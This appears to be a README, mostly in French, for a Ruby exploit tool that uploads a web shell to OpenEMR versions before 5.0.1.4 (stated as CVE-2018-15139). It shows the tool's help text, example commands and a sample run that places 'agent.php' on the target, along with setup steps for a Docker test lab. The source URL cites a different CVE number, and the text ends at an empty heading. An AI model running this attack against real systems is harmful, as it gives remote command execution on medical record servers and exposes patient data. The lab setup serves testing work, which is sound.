
OpenEMR < 5.0.1.4 - (Authentifié) Téléversement de fichier - Exécution de commande à distance
OpenEMR < 5.0.1.4 - (Authentifié) Téléversement de fichier - Exécution de commande à distance
Exploit pour CVE-2018-15139.
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
exploit.rb exploit <url> <filename> <username> <password> [--debug]
exploit.rb -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the shell to be uploaded
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
exploit.rb exploit http://example.org/openemr shell.php admin pass
exploit.rb exploit https://example.org:5000/ shell.php admin pass
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php
Exemple avec gem :
bundle install
# or
gem install httpx docopt
Avertissement : bien entendu, cette configuration n'est pas adaptée à une utilisation en production !
$ sudo docker-compose up
Les permissions du dossier de téléversement sont cassées dans l'image Docker officielle d'OpenEMR, il est donc nécessaire de se connecter au conteneur et de corriger les permissions, par ex. :
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/
docker-compose.ymlIl s'agit d'une meilleure réécriture de EDB-49998.
La vulnérabilité a été découverte par Project Insecurity.
Analyse de l'exploit et de la vulnérabilité d'origine :